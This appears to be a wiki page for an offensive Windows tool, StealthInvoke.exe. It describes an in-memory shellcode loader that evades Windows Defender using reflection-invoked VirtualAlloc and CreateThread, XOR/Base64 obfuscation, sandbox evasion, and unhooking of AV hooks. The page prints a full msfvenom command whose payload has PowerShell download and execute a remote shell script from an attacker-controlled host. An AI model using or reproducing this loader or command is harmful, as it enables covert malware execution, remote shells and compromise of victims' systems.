🦂StealthInvoke

Executes payloads undetected in memory.

StealthInvoke.exe is an application written in C#, capable of bypassing Windows Defender. It dynamically invokes the functions VirtualAlloc and CreateThread using the reflection module and decrypts a malicious payload in memory to bypass disk-based detection.

Features

Remote Interactive shell
Dynamically Invoke functions like VirtualAlloc and CreateThread
Basic Sandbox Evasion

How the script works:

Payload Generation: First, we generate a malicious payload using msfvenom. The command is as follows:

msfvenom --payload windows/exec CMD="cmd.exe /c powershell -c IEX(IWR http://10.X.X.X/shell.ps1 -UseBasicParsing);" EXITFUNC=thread -e x86/shikata_ga_nai -f csharp

Payload Encryption: Next, we encrypt the generated payload using XOR and Base64 encoding. This step is crucial, as it obfuscates the payload, making it more challenging for antivirus programs like Windows Defender to detect the malicious code.
We apply the same encryption approach to the VirtualAlloc and CreateThread function names to obscure their use in the code.
Dynamic Invocation and Decryption: Finally, using the System.Reflection module, we dynamically invoke these functions. The encrypted payload is then decrypted directly in memory.

Note:

Advanced antivirus programs may have hooked functions like "VirtualAlloc" and "CreateThread." To execute our malicious payload, we first need to unhook them and then load our payload into memory.

POC

7MB

Xor_Reflected.mp4

PreviousStealthInjector NextAMSI Patcher (Bypassing Antivirus)

Last updated 1 year ago